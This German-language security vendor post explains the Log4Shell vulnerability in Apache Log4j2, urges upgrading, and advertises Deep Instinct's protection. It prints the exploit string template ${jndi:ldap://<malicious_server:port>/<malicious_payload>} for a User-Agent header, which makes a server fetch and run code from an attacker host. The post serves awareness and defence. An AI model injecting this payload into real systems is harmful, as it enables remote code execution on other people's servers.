Logo Home

Over 10 years we helping companies reach their financial and branding goals. Onum is a values-driven SEO agency dedicated.

CONTACTS
Cybersecurity

Log4Shell (CVE-2021-44228) – Das müssen Sie wissen

Log4Shell CVE-2021-44228

Am 9. Dezember wurde eine schwerwiegende Remote-Code-Ausführung im Log4j2 von Apache entdeckt – einem weit verbreiteten Open-Source-Java-Framework, das von unzähligen kommerziellen, nicht-kommerziellen und intern entwickelten Anwendungen und Benutzern für die Protokollierung verwendet wird. 

Aufgrund der Einfachheit des Exploits und der massiven Nutzung der Log4j-Bibliothek in vielen Komponenten verschiedener Produkte hat Deep Instinct bereits mehrere POCs auf Github veröffentlicht, die diesen Exploit implementieren.

Die Schwachstelle wird Log4Shell genannt und ihre Ursache wurde inzwischen von den Autoren von Log4j2 behoben. Es wird dringend empfohlen, dass alle Benutzer von Log4j2 oder Anwendungen, die Log4j2 verwenden, auf die neueste Version (v2.15.0) des Frameworks oder der entsprechenden Anwendung aktualisieren.

Die Produktlinie, Agenten, Cloud-Infrastruktur und Server von Deep Instinct verwenden oder verlassen sich nicht auf log4j2 und können daher nicht dadurch kompromittiert werden.

Interessanterweise ist dies nicht das erste Mal, dass JNDI und LDAP für anfällige Software verantwortlich sind. Während Black Hat 2016 stellten Forscher vor, wie sie mithilfe dieser beiden Komponenten erfolgreich Remotecodeausführung einsetzen können.

Was macht Log4Shell so gefährlich?

Log4Shell missbraucht das Java Naming and Directory Interface (JNDI) und das Lightweight Directory Access Protocol (LDAP), um Anwendungen und Server, auf denen Log4j ausgeführt wird, zu zwingen, bösartige Nutzdaten abzurufen und auszuführen. 

JNDI, das seit den 1990er Jahren in Java präsent ist, ermöglicht es Java-Programmen und -Anwendungen, entfernte Daten zu lokalisieren und zu nutzen. LDAP ist ein Industriestandard-Protokoll auf Anwendungsebene, das den Zugriff auf Remote-Verzeichnisse über das Internet-Protokoll (IP) ermöglicht.

Die Schwachstelle ist außergewöhnlich leicht auszunutzen und erfordert (in einigen Fällen) nur einen präparierten User-Agent HTTP-Anforderungsheader.

Kurz zusammengefasst: Indem Sie einfach eine anfällige Anwendung veranlassen, ein bestimmtes Zeichenfolgenformat in ihre Protokolle zu schreiben, wird die Sicherheitsanfälligkeit „ausgelöst“. 

Auf einfachste Art und Weise kann ein Angreifer den HTTP-Anfrage User-Agent- Header in das folgende Format ändern: ${jndi:ldap://<malicious_server:port>/<malicious_payload>}, das von der empfangenden Anwendung protokolliert wird, wodurch Log4j die bösartige Payload abruft und willkürlich ausführt.

Das Ganze ist besonders gefährlich, da es jedem ermöglicht, der mit der anfälligen Anwendung interagiert, beliebigen Code aus der Ferne auf dem Computer auszuführen, auf dem die Anwendung gehostet wird.

Aktuelle Aktivitäten

Die Auswirkungen dieser Sicherheitsanfälligkeit und ihrer Ausnutzung sind enorm und betreffen Unternehmen aus einer Vielzahl von Sektoren, darunter Apple, Amazon, Tesla und Google. Dies gefährdet nicht nur diese Unternehmen, sondern auch die Kunden, die ihre Dienste nutzen.

Deep Instinct vs. CVE-2021-44228

Bei erfolgreicher Ausnutzung der Log4j2-Sicherheitslücke verhindert die agentenbasierte Lösung von Deep Instinct die Ausführung von Shellcode oder schädlichem Payload, der von kompromittierten Maschinen oder Umgebungen ausgeht. Konsequenter bösartiger Payload, der durch den Log4Shell-Exploit bereitgestellt wird, wird in der Pre-Execution-Phase durch Deep Instinct-Agenten unter Verwendung der Deep-Learning-Funktionen verhindert.

Das folgende Video zeigt, wie der Windows D-Client von Deep Instinct Sie vor dieser Gefahr schützt. Der Deep Instinct Windows D-Client wird auf einem Windows-Computer installiert, auf dem ein anfälliger Dienst ausgeführt wird. Der Rechner greift den Dienst an, indem er eine bösartige HTTP-Anfrage sendet, die den Windows-Rechner veranlasst, die Ausführung eines codierten PowerShell-Befehls zu versuchen.

 

Deep Instinct verfolgt einen Präventionsansatz, um Ransomware und andere Malware mithilfe des weltweit ersten und speziell entwickelten Deep-Learning-Ansatzes zu stoppen. Wir prognostizieren und verhindern bekannte, unbekannte und Zero-Day-Bedrohungen in unter 20 Millisekunden – 750-mal schneller als die schnellste Ransomware verschlüsseln kann.

Wenn Sie mehr über unsere Malware-, Ransomware- und Zero-Day-Prevention-Funktionen erfahren möchten, melden Sie sich gerne bei uns für eine kostenlose Demo.